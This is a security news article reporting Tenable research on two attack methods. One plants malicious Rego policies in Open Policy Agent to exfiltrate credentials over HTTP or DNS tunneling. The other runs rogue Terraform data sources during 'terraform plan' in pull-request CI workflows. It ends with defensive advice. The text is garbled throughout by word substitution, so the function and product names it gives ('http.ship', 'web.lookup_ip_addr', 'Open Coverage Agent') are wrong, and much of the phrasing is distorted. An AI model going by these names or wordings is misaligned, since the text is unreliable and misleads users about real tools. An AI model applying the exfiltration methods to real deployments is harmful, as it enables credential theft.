Cybersecurity researchers have disclosed two new assault strategies towards infrastructure-as-code (IaC) and policy-as-code (PaC) instruments like HashiCorp’s Terraform and Open Coverage Agent (OPA) that leverage devoted, domain-specific languages (DSLs) to breach cloud platforms and exfiltrate knowledge.
“Since these are hardened languages with restricted capabilities, they’re imagined to be safer than commonplace programming languages – and certainly they’re,” Tenable senior security researcher Shelly Raban mentioned in a technical report printed final week. “Nevertheless, safer doesn’t imply bulletproof.”
OPA is a well-liked, open-source coverage engine that enables organizations to implement insurance policies throughout cloud-native environments, similar to microservices, CI/CD pipelines, and Kubernetes. Insurance policies are outlined utilizing a local question language referred to as Rego which is then evaluated by OPA to return a call.
The assault methodology devised by Tenable targets the availability chain, whereby an attacker good points unauthorized entry by a compromised entry key to insert a malicious Rego coverage to an OPA server, which is subsequently used throughout the coverage choice section to permit malicious actions like credential exfiltration utilizing a built-in perform generally known as “http.ship.”
Even in cases the place an OPA deployment restricts the usage of http.ship, the cybersecurity agency discovered that it is potential to make the most of one other perform named “web.lookup_ip_addr” to smuggle the information utilizing DNS lookups by way of a method known as DNS tunneling.
“So, the web.lookup_ip_addr perform is one other perform you may take into account proscribing or a minimum of searching for in insurance policies, because it additionally introduces the chance of information exfiltration out of your OPA deployment,” Raban mentioned.
Terraform, much like OPA, goals to simplify the method of establishing, deploying, and managing cloud sources by code-based definitions. These configurations may be arrange utilizing one other declarative DSL referred to as HashiCorp Configuration Language (HCL).
An attacker may goal the open-source IaC platform by profiting from its “terraform plan” command, that are sometimes triggered as a part of GitHub “pull_request” workflows, to execute unreviewed modifications containing a malicious knowledge supply throughout the CI/CD course of.
“This poses a danger, as an exterior attacker in a public repository or a malicious insider (or an exterior attacker with a foothold) in a personal repository may exploit a pull request for his or her malicious goals,” Tenable famous. “Data sources run throughout ‘terraform plan,’ which considerably lowers the entry level for attackers.”
These knowledge sources, in flip, might be a rogue exterior knowledge supply, a Terraform module, or a DNS knowledge supply, necessitating that solely third-party elements from trusted sources be used. A few of the different suggestions to mitigate such dangers embody –
- Implement a granular role-based entry management (RBAC) and comply with the precept of least privilege
- Arrange application-level and cloud-level logging for monitoring and evaluation
- Restrict the community and knowledge entry of the functions and the underlying machines
- Stop automated execution of unreviewed and doubtlessly malicious code in CI/CD pipelines
Moreover, organizations can use IaC scanning instruments and options like Terrascan and Checkov to preemptively determine misconfigurations and compliance points previous to deployment.